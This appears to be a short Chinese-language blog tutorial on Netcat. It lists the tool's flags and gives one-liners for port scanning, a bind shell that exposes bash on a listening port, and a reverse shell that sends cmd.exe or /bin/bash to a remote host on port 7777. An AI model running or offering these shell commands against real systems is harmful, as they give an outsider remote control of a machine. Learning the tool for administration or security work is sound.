一般Netcat有两个版本,一个版本是不提供反向连接的版本,一个是全功能版本。这两者的区别就是是否带-e参数,只有带-e参数的版本才支持反向连接。

参数说明

  • -c shell commands shell模式
  • -e filename 程序重定向
  • -b 允许广播
  • -d 无命令行界面,使用后台模式
  • -g gateway 源路由跳跃点, 不超过8
  • -G num 源路由指示器: 4, 8, 12, ...
  • -h 获取帮助信息
  • -i secs 延时设置,端口扫描时使用
  • -k 设置在socket上的存活选项
  • -l 监听入站信息
  • -n 以数字形式表示的IP地址
  • -o file 使进制记录
  • -p port 本地端口
  • -r 随机本地和远程的端口
  • -q secs 在标准输入且延迟后退出(翻译的不是很好,后面实例介绍)
  • -s addr 本地源地址
  • -T tos 设置服务类型
  • -t 以TELNET的形式应答入站请求
  • -u UDP模式
  • -v 显示详细信息 [使用=vv获取更详细的信息
  • -w secs 连接超时设置
  • -z I/O 模式 [扫描时使用]
端口扫描
nc -nv ip port

Netcat工具-LMLPHP

nc -nvz -w 5 ip 1-65535

Netcat工具-LMLPHP

 
正向连接

将自己的Bash发送出去:

nc -lp port -c bash

  

监听:

nc ip port

  

反向连接
方式一、

监听:

nc -lvp 7777

反弹cmd:

nc -e cmd.exe(或者/bin/bash) 10.20.40.* 7777
05-17 20:46